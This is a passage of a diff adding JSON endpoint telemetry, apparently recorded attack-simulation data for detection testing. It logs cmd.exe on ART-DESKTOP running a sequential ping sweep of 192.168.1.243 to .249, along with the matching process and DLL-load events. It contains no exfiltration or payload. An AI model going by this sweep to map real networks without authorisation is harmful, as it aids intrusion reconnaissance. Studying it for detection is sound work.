"timestamp": 131883573176980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6756, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573176980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6756, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573176980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6756, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573176980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6756, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573176980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6756, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573176980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6756, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573176980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" + }, + { + "event_type": "process", + 
"pid": 6756, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573181830000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.243", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4796, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573181980000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573181980000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573181980000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573181980000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573181980000, + 
"unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573181980000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573181980000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573181980000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573181980000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573181980000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573181980000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + 
"image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573181980000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" + }, + { + "event_type": "process", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573186990000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.244", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5296, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573187130000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573187140000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573187140000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573187140000, + "unique_pid": 
"{42FC7E13-CBC6-5C05-0000-0010EFF05301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573187140000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573187140000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573187140000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573187140000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573187140000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573187140000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + 
"image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573187300000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573187300000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" + }, + { + "event_type": "process", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573191830000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.245", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5560, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573191980000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573191980000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573191980000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" 
+ }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573191980000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573191980000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573191980000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573191980000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573191980000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573191980000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": 
"C:\\Windows\\System32\\winnsi.dll", + "pid": 5560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573191980000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573191980000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573191980000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" + }, + { + "event_type": "process", + "pid": 5560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573196990000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.246", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3320, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573197140000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3320, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573197140000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" + }, + { + 
"event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3320, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573197140000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3320, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573197140000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3320, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573197140000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3320, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573197140000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3320, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573197140000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3320, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573197140000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + 
"pid": 3320, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573197140000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3320, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573197300000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3320, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573197300000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3320, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573197300000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" + }, + { + "event_type": "process", + "pid": 3320, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573201990000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.247", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 8156, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573202140000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + 
"image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 8156, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573202140000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 8156, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573202140000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 8156, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573202140000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 8156, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573202140000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 8156, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573202140000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 8156, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573202140000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 8156, + "process_name": 
"PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573202140000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 8156, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573202140000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 8156, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573202140000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 8156, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573202140000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 8156, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573202140000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" + }, + { + "event_type": "process", + "pid": 8156, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573206830000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.248", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5364, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", 
+ "timestamp": 131883573206980000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573206980000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573206980000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573206980000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573206980000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573206980000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5364, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573206980000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573206980000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573206980000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573206980000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573206980000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573206980000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" + }, + { + "event_type": "process", + "pid": 5364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573211830000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.249", 
